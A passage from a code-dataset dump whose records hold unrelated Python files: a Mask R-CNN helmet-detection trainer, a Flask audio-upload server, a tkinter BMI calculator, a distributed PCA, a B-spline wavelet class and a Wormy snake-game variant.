self.image_info[image_id]\n # 定义盒文件位置\n path = info['annotation']\n # 加载 XML\n boxes, w, h = self.get_position(path)\n # 为所有掩膜创建一个数组,每个数组都位于不同的通道\n masks = zeros([h, w, len(boxes)], dtype='uint8')\n # 创建掩膜\n class_ids = list()\n for i in range(len(boxes)):\n box = boxes[i]\n row_s, row_e = box[1], box[3]\n col_s, col_e = box[0], box[2]\n masks[row_s:row_e, col_s:col_e, i] = 1\n class_ids.append(self.class_names.index('Helmet'))\n return masks, asarray(class_ids, dtype='int32')\n\n # 加载图像引用\n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n\n# 定义模型配置\nclass HelmetConfig(Config):\n # 给配置对象命名\n NAME = \"helmet_cfg\"\n # 类的数量(背景中的 + 袋鼠)\n NUM_CLASSES = 1 + 1\n # 每轮训练的迭代数量\n STEPS_PER_EPOCH = 300\n\n\n# 训练集\ntrain_set = HelmetDataset()\ntrain_set.load_dataset(r'D:\\PersonalDocuments\\VOC2028', is_train=True)\ntrain_set.prepare()\n# 准备测试/验证集\ntest_set = HelmetDataset()\ntest_set.load_dataset(r'D:\\PersonalDocuments\\VOC2028', 
is_train=False)\ntest_set.prepare()\n# 准备配置信息\nconfig = HelmetConfig()\nconfig.display()\n# 定义模型\nmodel = MaskRCNN(mode='training', model_dir='./', config=config)\n# 加载 mscoco 权重信息,排除输出层\nmodel.load_weights('mask_rcnn_coco.h5', by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\", \"mrcnn_bbox\", \"mrcnn_mask\"])\n# 训练权重(输出层,或者说‘头部’)\nmodel.train(train_set, test_set, learning_rate=config.LEARNING_RATE, epochs=5, layers='heads')\n\n# 加载图像\nimage_id = 0\nimage = train_set.load_image(image_id)\nprint(image.shape)\n# 加载图像掩膜\nmask, class_ids = train_set.load_mask(image_id)\nprint(mask.shape)\n\n\"\"\"\n# 绘制最开始的几张图像\nfor i in range(9):\n # 定义子图\n pyplot.subplot(330 + 1 + i)\n # 绘制原始像素数据\n image = train_set.load_image(i)\n pyplot.imshow(image)\n # 绘制所有掩膜\n mask, _ = train_set.load_mask(i)\n for j in range(mask.shape[2]):\n pyplot.imshow(mask[:, :, j], cmap='gray', alpha=0.3)\n# 展示绘制结果\npyplot.show()\n\"\"\"","sub_path":"Train/Train-not-working.py","file_name":"Train-not-working.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"155045660","text":"from collections import Counter\nfrom collections import namedtuple\nfrom random import randint\n\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d.axes3d as p3\nimport matplotlib.animation as animation\n\n\nCategory = namedtuple('Category', ['name', 'rank'])\nWarehouse = namedtuple('Warehouse', ['name', 'rank'])\nBar = namedtuple('Bar', ['instance', 'height'])\nDataRow = namedtuple('DataRow', ['category', 'warehouse'])\n\nCATEGORIES = [Category('C_NAME', i) for i in range(20)] # cats ranking\nWAREHOUSES = [Warehouse('W_NAME', i) for i in range(20)] # warehouses ranking\n\nc_count = len(CATEGORIES)\nwh_count = len(WAREHOUSES)\n\nROWS_COUNT = 100 # number of rows to render in test case\n\nDATA = [DataRow(randint(0, c_count), randint(0, wh_count)) for i in range(ROWS_COUNT)] # test data\n\nCOLOR_MAP = {} # can specify colors for certain cat / wh\nCACHE_CHUNK_SIZE = 5\n\n\n# define update function\ndef update(num, bars_collection: dict) -> dict:\n cache = [DATA.pop(0) for i in range(CACHE_CHUNK_SIZE) if DATA]\n if cache:\n prepared_cache = Counter(cache)\n for row, count in prepared_cache.items():\n if row in bars_collection:\n current_bar: Bar = bars_collection[row]\n bars_collection[row]: dict = Bar(ax.bar3d(\n row.category, row.warehouse, 0, 1, 1, current_bar.height + count,\n color=COLOR_MAP.get(row, 'b'),\n alpha=0.8), current_bar.height + count)\n else:\n bars_collection[row] = Bar(ax.bar3d(\n row.category, row.warehouse, 0, 1, 1, 1,\n color=COLOR_MAP.get(row, 'b'),\n alpha=0.2), 1) # tuple\n\n return bars_collection\n\n# create figure\nfig = plt.figure()\nax = p3.Axes3D(fig)\n\nline_ani = animation.FuncAnimation(fig, update, 100, fargs=[dict()], interval=50, blit=False)\n\n# add labels\nax.w_xaxis.set_ticklabels([c.name for c in CATEGORIES])\nax.w_yaxis.set_ticklabels([w.name for w in WAREHOUSES])\nax.set_xlabel('Categories')\nax.set_ylabel('Warehouses')\nax.set_zlabel('SKU count')\n\n# perform\nplt.show()","sub_path":"scripts/3D-plot.py","file_name":"3D-plot.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128492625","text":"import wave, aifc, sys, struct, json, os\n\nfrom flask import Flask, redirect, request, url_for, render_template\nfrom werkzeug import secure_filename\n\nUPLOAD_FOLDER = '/tmp/'\nALLOWED_EXTENSIONS = 
set(['wav','wave', 'aif', 'aiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n@app.route('/')\ndef main_page():\n return redirect('/analyze.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n from jinja2 import FileSystemLoader\n app.jinja_loader = FileSystemLoader(\n os.path.join(os.path.dirname(__file__), '..'))\n\n soundfile = request.files['spikes_file']\n if soundfile and allowed_file(soundfile.filename):\n filename = secure_filename(soundfile.filename)\n soundfile.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return render_template('analyze.html',\n sampleData= provide_json_of_wav(filename))\n else:\n return \"Invalid file\"\n\ndef allowed_file(filename):\n name, extension = filename.rsplit('.', 1)\n return '.' in filename and extension in ALLOWED_EXTENSIONS and name is not ''\n\ndef get_audio_object_for(filename):\n \"return a Wave_read or Aiff object as necessary\"\n if 'wav' in filename:\n # assume we're a wave file\n return wave.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n elif 'aif' in filename:\n return aifc.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\ndef provide_json_of_wav(filename):\n w = get_audio_object_for(filename)\n if w:\n if w.__class__ == wave.Wave_read:\n fmt = \"h\"\n if w.getnchannels() > 1:\n fmt += 'h'\n\n pcm_list = []\n for i in range(w.getnframes()):\n frame = w.readframes(1)\n if len(frame) != struct.calcsize(fmt):\n continue\n pcm_list.append(struct.unpack(fmt, frame)[0])\n\n return json.dumps(pcm_list)\n else:\n return \"Oops!, couldn't read\" + \\\n os.path.join(app.config['UPLOAD_FOLDER'], filename)\n\nif __name__ == '__main__':\n app.config['DEBUG'] = True\n if app.config['DEBUG']:\n from werkzeug import SharedDataMiddleware\n app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {\n '/': os.path.join(os.path.dirname(__file__), '..')\n })\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594833072","text":"import tkinter as tk\n\n# ボタンを押したときの処理 --- (*1)\ndef calc_bmi():\n # BMIを計算\n h = float(textHeight.get()) / 100\n w = float(textWeight.get())\n bmi = w / h ** 2\n rw = h ** 2 * 22\n per = int(w / rw * 100) - 100\n # 結果をラベルに表示\n s = \"肥満 {0}% (bmi={1})\".format(per, bmi)\n labelResult['text'] = s\n\n# ウィンドウを作成 --- (*2)\nwin = tk.Tk()\nwin.title(\"肥満判定\")\nwin.geometry(\"500x250\")\n\n# 部品を作成 --- (*3)\nlabelHeight = tk.Label(win, text=u'身長(cm):')\nlabelHeight.pack()\n\ntextHeight = tk.Entry(win)\ntextHeight.insert(tk.END, '160')\ntextHeight.pack()\n\nlabelWeight = tk.Label(win, text=u'体重(kg):')\nlabelWeight.pack()\n\ntextWeight = tk.Entry(win)\ntextWeight.insert(tk.END, '70')\ntextWeight.pack()\n\nlabelResult = tk.Label(win, text=u'---')\nlabelResult.pack()\n\ncalcButton = tk.Button(win, text=u'計算')\ncalcButton[\"command\"] = calc_bmi\ncalcButton.pack()\n\n# ウィンドウを動かす\nwin.mainloop()","sub_path":"tkinter/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"207979133","text":"this_line = input().split()\np = int(this_line[0])\ny = int(this_line[1])\n\nans = -1\nwhile(y>p):\n find = True\n\n right = min(p+1, int(y**0.5) + 1)\n\n for i in range(2, right):\n if(y%i==0):\n find = False\n break\n if(find):\n ans = y\n 
break\n \n y -=1\n\n\n\n\nprint(ans)","sub_path":"937B.py","file_name":"937B.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"132601400","text":"from copy import copy\n\nimport numpy as np\nfrom pycompss.api.api import compss_wait_on\nfrom pycompss.api.parameter import COLLECTION_IN, Depth, Type, COLLECTION_INOUT\nfrom pycompss.api.task import task\nfrom sklearn.base import BaseEstimator\nfrom sklearn.utils import validation\n\nfrom dislib.data.array import Array\n\n\nclass PCA(BaseEstimator):\n \"\"\" Principal component analysis (PCA) using the covariance method.\n\n Performs a full eigendecomposition of the covariance matrix.\n\n Parameters\n ----------\n n_components : int or None, optional (default=None)\n Number of components to keep. If None, all components are kept.\n arity : int, optional (default=50)\n Arity of the reductions.\n\n Attributes\n ----------\n components_ : array, shape (n_components, n_features)\n Principal axes in feature space, representing the directions of maximum\n variance in the data. The components are sorted by explained_variance_.\n\n Equal to the n_components eigenvectors of the covariance matrix with\n greater eigenvalues.\n explained_variance_ : array, shape (n_components,)\n The amount of variance explained by each of the selected components.\n\n Equal to the first n_components largest eigenvalues of the covariance\n matrix.\n mean_ : array, shape (n_features,)\n Per-feature empirical mean, estimated from the training set.\n\n Examples\n --------\n >>> from dislib.decomposition import PCA\n >>> import numpy as np\n >>> import dislib as ds\n >>> x = np.array([[1, 2], [1, 4], [1, 0], [4, 2], [4, 4], [4, 0]])\n >>> bn, bm = 2, 2\n >>> data = ds.array(x=x, block_size=(bn, bm))\n >>> pca = PCA()\n >>> transformed_data = pca.fit_transform(data)\n >>> print(transformed_data)\n >>> print(pca.components_)\n >>> print(pca.explained_variance_)\n \"\"\"\n\n def __init__(self, n_components=None, arity=50):\n self.n_components = n_components\n self.arity = arity\n\n @property\n def components_(self):\n validation.check_is_fitted(self, '_components')\n self._components = compss_wait_on(self._components)\n return self._components\n\n @property\n def explained_variance_(self):\n validation.check_is_fitted(self, '_variance')\n self._variance = compss_wait_on(self._variance)\n return self._variance\n\n def fit(self, x):\n \"\"\" Fit the model with the dataset.\n\n Parameters\n ----------\n x : ds-array, shape (n_samples, n_features)\n Training data.\n\n Returns\n -------\n self : PCA\n \"\"\"\n\n n_samples = x.shape[0]\n self.mean_ = _features_mean(x, self.arity, n_samples)\n norm_blocks = []\n for rows in x._iterator('rows'):\n aux_rows = [object() for _ in range(x._n_blocks[1])]\n _normalize(rows._blocks, aux_rows, self.mean_)\n norm_blocks.append(aux_rows)\n\n # we shallow copy the original to create a normalized darray\n norm_x = copy(x)\n # shallow copy is enough to avoid modifying original darray x when\n # changing the blocks\n norm_x._blocks = norm_blocks\n\n scatter_matrix = _scatter_matrix(norm_x, self.arity)\n covariance_matrix = _estimate_covariance(scatter_matrix, n_samples)\n eig_val, eig_vec = _decompose(covariance_matrix, self.n_components)\n\n self._components = eig_vec\n self._variance = eig_val\n\n return self\n\n def fit_transform(self, x):\n \"\"\" Fit the model with the dataset and apply the dimensionality\n reduction to it.\n\n Parameters\n 
----------\n x : ds-array, shape (n_samples, n_features)\n Training data.\n\n Returns\n -------\n transformed_darray : ds-array, shape (n_samples, n_components)\n \"\"\"\n return self.fit(x).transform(x)\n\n def transform(self, x):\n \"\"\"\n Apply dimensionality reduction to ds-array.\n\n The given dataset is projected on the first principal components\n previously extracted from a training ds-array.\n\n Parameters\n ----------\n x : ds-array, shape (n_samples, n_features)\n New ds-array, with the same n_features as the training dataset.\n\n Returns\n -------\n transformed_darray : ds-array, shape (n_samples, n_components)\n \"\"\"\n return _transform(x, self.mean_, self.components_)\n\n\ndef _features_mean(x, arity, n_samples):\n partials = []\n for rows in x._iterator('rows'):\n partials.append(_subset_feature_sum(rows._blocks))\n return _reduce_features_mean(partials, arity, n_samples)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2}, returns=1)\ndef _subset_feature_sum(blocks):\n block = Array._merge_blocks(blocks)\n return block.sum(axis=0)\n\n\ndef _reduce_features_mean(partials, arity, n_samples):\n while len(partials) > 1:\n partials_chunk = partials[:arity]\n partials = partials[arity:]\n partials.append(_merge_features_sum(*partials_chunk))\n return _finalize_features_mean(partials[0], n_samples)\n\n\n@task(returns=1)\ndef _merge_features_sum(*partials):\n return sum(partials)\n\n\n@task(returns=1)\ndef _finalize_features_mean(feature_sums, n_samples):\n return feature_sums / n_samples\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2},\n out_blocks={Type: COLLECTION_INOUT, Depth: 1})\ndef _normalize(blocks, out_blocks, means):\n data = Array._merge_blocks(blocks)\n data = np.array(data - means)\n\n bn, bm = blocks[0][0].shape\n\n for j in range(len(blocks[0])):\n out_blocks[j] = data[:, j * bm:(j + 1) * bm]\n\n\ndef _scatter_matrix(x, arity):\n partials = []\n for rows in x._iterator('rows'):\n partials.append(_subset_scatter_matrix(rows._blocks))\n return _reduce_scatter_matrix(partials, arity)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2}, returns=1)\ndef _subset_scatter_matrix(blocks):\n data = Array._merge_blocks(blocks)\n return np.dot(data.T, data)\n\n\ndef _reduce_scatter_matrix(partials, arity):\n while len(partials) > 1:\n partials_chunk = partials[:arity]\n partials = partials[arity:]\n partials.append(_merge_partial_scatter_matrix(*partials_chunk))\n return partials[0]\n\n\n@task(returns=1)\ndef _merge_partial_scatter_matrix(*partials):\n return sum(partials)\n\n\n@task(returns=1)\ndef _estimate_covariance(scatter_matrix, n_samples):\n return scatter_matrix / (n_samples - 1)\n\n\n@task(returns=2)\ndef _decompose(covariance_matrix, n_components):\n eig_val, eig_vec = np.linalg.eigh(covariance_matrix)\n\n if n_components is None:\n n_components = len(eig_val)\n\n # first n_components eigenvalues in descending order:\n eig_val = eig_val[::-1][:n_components]\n\n # first n_components eigenvectors in rows, with the corresponding order:\n eig_vec = eig_vec.T[::-1][:n_components]\n\n # normalize eigenvectors sign to ensure deterministic output\n max_abs_cols = np.argmax(np.abs(eig_vec), axis=1)\n signs = np.sign(eig_vec[range(len(eig_vec)), max_abs_cols])\n eig_vec *= signs[:, np.newaxis]\n\n return eig_val, eig_vec\n\n\ndef _transform(x, mean, components):\n new_blocks = []\n for rows in x._iterator('rows'):\n out_blocks = [object() for _ in range(rows._n_blocks[1])]\n _subset_transform(rows._blocks, out_blocks, mean, components)\n new_blocks.append(out_blocks)\n\n 
return Array(blocks=new_blocks, top_left_shape=x._top_left_shape,\n reg_shape=x._reg_shape,\n shape=(x.shape[0], components.shape[1]), sparse=x._sparse)\n\n\n@task(blocks={Type: COLLECTION_IN, Depth: 2},\n out_blocks={Type: COLLECTION_INOUT, Depth: 1})\ndef _subset_transform(blocks, out_blocks, mean, components):\n data = Array._merge_blocks(blocks)\n bn, bm = blocks[0][0].shape\n\n res = (np.matmul(data - mean, components.T))\n\n for j in range(0, len(blocks[0])):\n out_blocks[j] = res[:, j * bm:(j + 1) * bm]\n","sub_path":"dislib/decomposition/pca/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"111854533","text":"import torch\n\nfrom distdl.nn.broadcast import Broadcast\nfrom distdl.nn.module import Module\nfrom distdl.nn.sum_reduce import SumReduce\nfrom distdl.utilities.slicing import compute_subshape\n\n\nclass DistributedLinear(Module):\n\n def __init__(self, P_x, P_y, P_w, in_features, out_features, bias=True):\n\n super(DistributedLinear, self).__init__()\n\n # P_x ~ 1 X P_fi\n self.P_x = P_x\n # P_y ~ 1 X P_fo\n self.P_y = P_y\n # P_w ~ P_fo X P_fi\n self.P_w = P_w\n\n self.bias = bias\n\n self.x_broadcast = Broadcast(self.P_x, self.P_w, preserve_batch=True)\n\n if self.P_w.active:\n local_in_features = compute_subshape(P_w.shape[1], P_w.index[1], in_features)\n local_out_features = compute_subshape(P_w.shape[0], P_w.index[0], out_features)\n # On column 0, use the specified bias, otherwise no bias to\n # prevent double counting\n bias = self.bias if (self.P_w.index[-1] == 0) else False\n self.sublinear = torch.nn.Linear(local_in_features[0], local_out_features[0], bias=bias)\n\n self.y_sum_reduce = SumReduce(self.P_w, self.P_y,\n transpose_src=True, preserve_batch=True)\n\n def forward(self, input):\n\n if not (self.P_x.active or self.P_y.active or self.P_w.active):\n return input.clone()\n\n # broadcast x down the columns\n x = self.x_broadcast(input)\n\n # apply the linear layer\n if self.P_w.active:\n x = self.sublinear(x)\n\n # reduce y across the rows\n y = self.y_sum_reduce(x)\n\n return y\n","sub_path":"src/distdl/nn/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503409353","text":"#!/usr/bin/env python3.6\n\n# -*- coding: utf-8 -*-\n\n# Imports\nimport logging\nimport argparse\nimport util.config\nimport npyscreen\nimport os\nimport locale\nfrom util.forms.splash import SplashFormClass\n\n# Globals and other helper functions\n\n\nclass HDPTuiApp(npyscreen.NPSAppManaged):\n def onStart(self):\n self.registerForm(\"MAIN\", SplashFormClass())\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"HDP Text User Interface.\",\n epilog=\"Made by César (Idaho06) Rodríguez Moreno.\")\n # parser.add_argument(\"echo\", help=\"echo the string you use here\")\n # parser.add_argument(\"-db\", \"--database\", help=\"Database to be used.\", default=\"/tmp/termgame.sqlite3\")\n parser.add_argument(\"-d\", \"--debug\", help=\"Debug level: DEBUG, INFO, WARNING, ERROR or CRITICAL\", default=\"WARNING\")\n parser.add_argument(\"-o\", \"--erroroutput\", help=\"File of error output. Default is stderr.\", default=\"stderr\")\n parser.add_argument(\"-c\", \"--config\", help=\"Sets configuration file. 
Default is hdptui.ini\", default=\"hdptui.ini\")\n args = parser.parse_args()\n\n loglevel = logging.WARNING\n logoutput = None\n if args.debug == \"DEBUG\":\n loglevel = logging.DEBUG\n if args.debug == \"INFO\":\n loglevel = logging.INFO\n if args.debug == \"ERROR\":\n loglevel = logging.ERROR\n if args.debug == \"CRITICAL\":\n loglevel = logging.CRITICAL\n if args.erroroutput != \"stderr\":\n logoutput = args.erroroutput\n logging.basicConfig(level=loglevel, filename=logoutput,\n format=\"%(asctime)s %(levelname)s: %(funcName)s: %(message)s\")\n logging.info(\"Logging level set to %s.\" % logging.getLevelName(loglevel))\n\n config = util.config.ConfigClass(args.config)\n\n if os.environ.get('LC_ALL') is None:\n os.environ['LC_ALL'] = \"en_US.UTF-8\"\n\n TA = HDPTuiApp()\n\n exit(TA.run())\n","sub_path":"hdptui.py","file_name":"hdptui.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500605826","text":"import numpy as np \nimport scipy.interpolate \nimport matplotlib.pyplot as plt \nfrom helper_functions import spline_support \nimport scipy.integrate \n\n\n\nclass Wavelet:\n\n def __init__(self, j, d, mask):\n self.d = d\n self.j = j + 1 \n self.knot_sequence = [0 for ii in range(d)] + [2**-self.j * ii for ii in range(1,2**self.j)] + [1 for ii in range(d)]\n self.basis_dimension = 2**self.j + d -1\n self.function = scipy.interpolate.BSpline(self.knot_sequence, mask, d-1, extrapolate = False) \n self.evaluate_support(mask) \n\n def evaluate_support(self, mask):\n\n indices = np.where(abs(mask) > 1e-5)[0]\n l_1 = 1\n l_2 = 0\n for k in indices:\n new_l1, new_l2 = spline_support(k, self.j, self.d)\n if new_l1 < l_1:\n l_1 = new_l1\n if new_l2 > l_2:\n l_2 = new_l2 \n\n self.l_1 = l_1\n self.l_2 = l_2\n\n def inner_product(self, f):\n\n return scipy.integrate.quad(lambda x:f(x)*self.eval(x) , self.l_1, self.l_2)[0]\n\n\n\n def eval(self, x):\n return 2**(self.j/2.) * self.function(x) \n\n def plot(self, show = True, derivative = False):\n x = np.linspace(0,1,1000)\n plt.plot(x, self.eval(x))\n\n if derivative:\n plt.plot(x, self.derivative(x))\n if show: \n plt.show() \n\n\n def derivative(self, x):\n derivative = self.function.derivative()\n return 2**(self.j/2.)*derivative(x)\n\n\n\n\n\nif __name__ == \"__main__\":\n \n coeff = np.zeros((66,1))\n coeff[1] = 1.0\n coeff[2] = 1.0\n wavelet = Wavelet(5, 3, coeff)\n \n wavelet.plot()","sub_path":"src/wavelet.py","file_name":"wavelet.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"170633051","text":"import os\r\nimport flask\r\nfrom flask import Flask, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nimport uuid\r\nfrom model import BdConnection, db, setMessage, getMessage\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('dbdir')\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\nwith app.app_context():\r\n\tdb = SQLAlchemy(app)\r\n\tBdConnection(db)\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return \"
Chatbot conversation
\"\r\n\r\n@app.route('/sendMessage', methods=['GET'])\r\ndef sendMessage():\r\n message = request.args.get('message')\r\n idTrabajo = str(uuid.uuid4())\r\n messageBd = getMessage()\r\n return messageBd\r\n\r\n@app.route('/dumpMessage', methods=['POST'])\r\ndef dumpMessage():\r\n jrequest = request.get_json()\r\n message = jrequest.get('message')\r\n idTrabajo = str(uuid.uuid4())\r\n setMessage(idTrabajo, message)\r\n return \"Mensaje insertado en la BBDD\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295649444","text":"# Wormy (a Nibbles clone)\n# By Al Sweigart al@inventwithpython.com\n# http://inventwithpython.com/pygame\n# Released under a \"Simplified BSD\" license\n\nimport random, pygame, sys\nfrom pygame.locals import *\n\nFPS = 30\nWINDOWWIDTH = 800\nWINDOWHEIGHT = 640\nCELLSIZE = 10\nassert WINDOWWIDTH % CELLSIZE == 0, \"Window width must be a multiple of cell size.\"\nassert WINDOWHEIGHT % CELLSIZE == 0, \"Window height must be a multiple of cell size.\"\nCELLWIDTH = int(WINDOWWIDTH / CELLSIZE)\nCELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)\n\nSEEKLENGTH = 10 #The radius from an Apple until a worm \"knows\" about it.\nUSEAGENTS = True #Use Agents instead of central control\nQUADRANT = False #Generate apples only in one quadrant\n\n# R G B\nWHITE = (255, 255, 255)\nBLACK = ( 0, 0, 0)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\nBGCOLOR = BLACK\n\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\nAPPLES = []\nWORMS = []\n\nSCORE = 0\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def distance(self, point):\n return abs(self.x - point.x) + abs(self.y - point.y)\n\nclass Apple(Point):\n def __init__(self, x, y, life):\n self.x = x\n self.y = y\n self.life = life\n\n def tick(self):\n self.life -= 1\n if self.life == 0:\n global SCORE\n SCORE -= 1\n APPLES.remove(self)\n \nclass Worm:\n def __init__(self, x, y, agent):\n self.wormCoords = [Point(x,y),\n Point(x - 1, y),\n Point(x - 2, y)]\n self.direction = RIGHT\n self.agent = agent\n self.death = False\n\n @property\n def head(self):\n return self.wormCoords[0]\n\n #Grow the worm\n def appendHead(self, value):\n self.wormCoords.insert(0, value)\n\n #Move away from a point\n def moveAwayFromPoint(self, point):\n self.direction = UP\n currentDistance = point.distance(Point(self.head.x, self.head.y - 1))\n\n distance = point.distance(Point(self.head.x, self.head.y + 1))\n if (distance > currentDistance):\n self.direction = DOWN\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x - 1, self.head.y))\n if (distance > currentDistance):\n self.direction = LEFT\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x + 1, self.head.y))\n if (distance > currentDistance):\n self.direction = RIGHT\n\n #Move towards a point \n def moveTowardsPoint(self, point):\n self.direction = UP\n currentDistance = point.distance(Point(self.head.x, self.head.y - 1))\n\n distance = point.distance(Point(self.head.x, self.head.y + 1))\n if (distance < currentDistance):\n self.direction = DOWN\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x - 1, self.head.y))\n if (distance < currentDistance):\n self.direction = LEFT\n currentDistance = distance\n\n distance = point.distance(Point(self.head.x + 1, self.head.y))\n if 
(distance < currentDistance):\n self.direction = RIGHT\n\n #Move left or right randomly\n def moveToTheSide(self):\n if random.randint(0,1) == 0:\n self.moveCounterClockwise()\n else:\n self.moveClockwise()\n\n #Move randomly\n def moveRandomDirection(self):\n newDirection = random.randint(0,15)\n if newDirection == 0 and self.direction != UP:\n self.direction = UP\n elif newDirection == 1 and self.direction != DOWN:\n self.direction = DOWN\n elif newDirection == 2 and self.direction != LEFT:\n self.direction = LEFT\n elif newDirection == 3 and self.direction != RIGHT:\n self.direction = RIGHT\n\n #Move left\n def moveCounterClockwise(self):\n if self.direction == UP:\n self.direction = LEFT\n elif self.direction == LEFT:\n self.direction = DOWN\n elif self.direction == DOWN:\n self.direction = RIGHT\n elif self.direction == RIGHT:\n self.direction = UP\n\n #Move right \n def moveClockwise(self):\n if self.direction == UP:\n self.direction = RIGHT\n elif self.direction == RIGHT:\n self.direction = DOWN\n elif self.direction == DOWN:\n self.direction = LEFT\n elif self.direction == LEFT:\n self.direction = UP\n\n #Turn around\n def moveOpposite(self):\n if self.direction == UP:\n self.direction = DOWN\n elif self.direction == RIGHT:\n self.direction = LEFT\n elif self.direction == DOWN:\n self.direction = UP\n elif self.direction == LEFT:\n self.direction = RIGHT\n\n #Kill the worm \n def kill(self):\n self.death = True\n self.wormCoords = []\n WORMS.remove(self)\n\n #Get apples the worm knows about\n @property\n def closeApples(self):\n return sorted(filter((lambda x: x.distance(self.head) < SEEKLENGTH), APPLES), key=lambda x: x.distance(self.head))\n\n #Get worms the worm knows about\n @property\n def closeWorms(self):\n return sorted(filter((lambda x: x.head.distance(self.head) < SEEKLENGTH), WORMS), key=lambda x: x.head.distance(self.head))\n\n #Tick\n def tick(self):\n if self.death:\n return\n\n #Eat any apples and split the worm in two if length is greater than 6.\n for apple in APPLES:\n if self.head.x == apple.x and self.head.y == apple.y:\n # don't remove worm's tail segment\n APPLES.remove(apple)\n self.wormCoords.append(self.wormCoords[-1])\n global SCORE\n SCORE += 1\n if len(self.wormCoords) >= 6:\n WORMS.remove(self)\n worm1 = Worm(self.head.x, self.head.y, self.agent)\n worm2 = Worm(self.wormCoords[-1].x, self.wormCoords[-1].y, self.agent)\n worm1.direction = self.direction\n worm2.direction = self.direction\n worm2.moveOpposite()\n WORMS.append(worm1)\n WORMS.append(worm2)\n \n return\n\n\n #Are we an agent? If so move the worm according to two simple rules.\n if self.agent:\n #If any apples are close, move towards the closest. Otherwise, move randomly.\n if len(self.closeApples) != 0:\n self.moveTowardsPoint(self.closeApples[0])\n else:\n self.moveRandomDirection()\n\n #Move the worm in the current direction. 
If direction is invalid, turn until a valid direction is found.\n validMove = False\n while validMove == False:\n \n validMove = True\n \n #Move the the worm by adding a segment in the direction it is moving\n if self.direction == UP:\n newHead = Point(self.head.x, self.head.y - 1)\n elif self.direction == DOWN:\n newHead = Point(self.head.x, self.head.y + 1)\n elif self.direction == LEFT:\n newHead = Point(self.head.x - 1, self.head.y)\n elif self.direction == RIGHT:\n newHead = Point(self.head.x + 1, self.head.y)\n self.appendHead(newHead)\n \n # check if the worm has his the edge\n if self.head.x == -1 or self.head.x == CELLWIDTH or self.head.y == -1 or self.head.y == CELLHEIGHT:\n self.wormCoords.pop(0)\n validMove = False\n \n #check if the worm has hit itself\n for wormBody in self.wormCoords[1:]:\n if wormBody.x == self.head.x and wormBody.y == self.head.y:\n self.wormCoords.pop(0)\n validMove = False\n \n \n if validMove == False:\n self.moveToTheSide()\n \n\n #check if the worm has hit another worm.\n for worm in WORMS:\n for wormBody in worm.wormCoords:\n if worm != self and self.head.x == wormBody.x and self.head.y == wormBody.y:\n #Kill the longest worm\n if len(worm.wormCoords) > len(self.wormCoords):\n worm.kill()\n else:\n self.kill()\n return\n \n del self.wormCoords[-1] # remove worm's tail segment\n\n\ndef main():\n global FPSCLOCK, DISPLAYSURF, BASICFONT\n random.seed(8018593223) #seed with number\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\n pygame.display.set_caption('Wormy')\n\n showStartScreen()\n while True:\n runGame()\n showGameOverScreen()\n\n\ndef runGame():\n\n ticks = 0\n \n # Start the apples in a random place.\n for i in range(0, 100):\n point = getRandomLocation()\n if QUADRANT:\n point = getRandomLocationInQuadrant()\n apple = Apple(point.x, point.y, random.randint(100,300))\n 